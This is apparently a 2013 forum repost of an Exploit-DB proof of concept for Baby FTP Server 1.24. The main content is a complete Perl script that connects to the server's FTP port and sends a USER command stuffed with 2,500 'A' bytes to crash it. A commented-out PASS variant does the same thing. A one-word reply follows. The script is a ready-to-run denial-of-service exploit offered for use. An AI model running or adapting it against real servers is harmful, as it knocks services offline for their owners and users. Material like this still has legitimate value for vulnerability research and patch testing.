Baby FTP Server 1.24 - Denial Of Service

Matt · June 27, 2013

Author : Chako

Source : Baby FTP Server 1.24 - Denial Of Service

Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/d015ca97b65dd039a31a68b9ee725fc8-babyftp.zip

Code :

#!/usr/bin/perl
#
#
#
###################################################################
#
# Exploit Title: Baby FTP Server Version 1.24 Denial Of Service
# Date: 2013/6/25
# Exploit Author: Chako
# Vendor Homepage: http://www.pablosoftwaresolutions.com/html/baby_ftp_server.html
# Software Download Link: http://www.pablosoftwaresolutions.com/files/babyftp.zip
# Version: 1.24
# Tested on: Windows 7
# Description:
#       A bug discovered  in Baby FTP Server Version 1.24 allows an attacker
#       to cause a Denial of Service using a specially crafted request(USER, PASS...etc).
#
################################################################### 
use IO::Socket;

$TARGET = "127.0.0.1";
$PORT   = 21;
$JUNK = "\x41" x 2500;

$PAYLOAD = "USER ".$JUNK."\r\n";
#$PAYLOAD = "PASS ".$JUNK."\r\n";


$SOCKET = IO::Socket::INET->new(Proto=>'TCP', 
                                PeerHost=>$TARGET, 
                                PeerPort=>$PORT) or die "Error: $TARGET :$PORT\n";

$SOCKET->send($PAYLOAD);

close($SOCKET);

aaaax22268578956 · June 28, 2013

Interesant :-?

Sign In

Baby FTP Server 1.24 - Denial Of Service

Recommended Posts

Matt

aaaax22268578956

Join the conversation

Browse

Activity

Pages